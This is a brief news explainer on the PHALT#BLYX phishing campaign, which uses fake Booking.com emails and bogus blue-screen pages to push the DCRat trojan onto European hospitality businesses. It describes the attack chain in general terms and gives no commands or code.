What's Happening?
A new phishing campaign, dubbed PHALT#BLYX, is targeting the European hospitality sector by using fake Booking.com emails to deliver a remote access trojan known as DCRat. The attack begins with a phishing email that
impersonates Booking.com, urging recipients to click a link to confirm a reservation cancellation. This link redirects victims to a fake website that mimics Booking.com and leads them to a bogus blue screen of death (BSoD) page. Victims are instructed to execute a PowerShell command, which deploys DCRat. This trojan can harvest sensitive information and expand its functionality through a plugin-based architecture. The campaign uses living-off-the-land techniques, such as abusing trusted system binaries like MSBuild.exe, to maintain persistence and evade detection.
Why It's Important?
This campaign highlights the evolving tactics of cybercriminals who are leveraging sophisticated methods to bypass security measures and exploit trusted systems. By targeting the hospitality sector, the attackers can potentially access sensitive customer data and disrupt operations. The use of fake booking emails and BSoD pages demonstrates a deep understanding of modern endpoint protection mechanisms, posing a significant threat to businesses. The campaign's focus on European organizations, with phishing emails featuring room charge details in Euros, suggests a targeted approach that could have widespread implications for the industry.
Beyond the Headlines
The use of Russian language within the MSBuild file links this activity to Russian threat actors, indicating a possible geopolitical dimension to the campaign. The reliance on living-off-the-land techniques reflects a broader trend in cybercrime, where attackers use legitimate tools to carry out malicious activities, making detection and prevention more challenging. This underscores the need for enhanced cybersecurity measures and international cooperation to address the growing threat of cyberattacks.
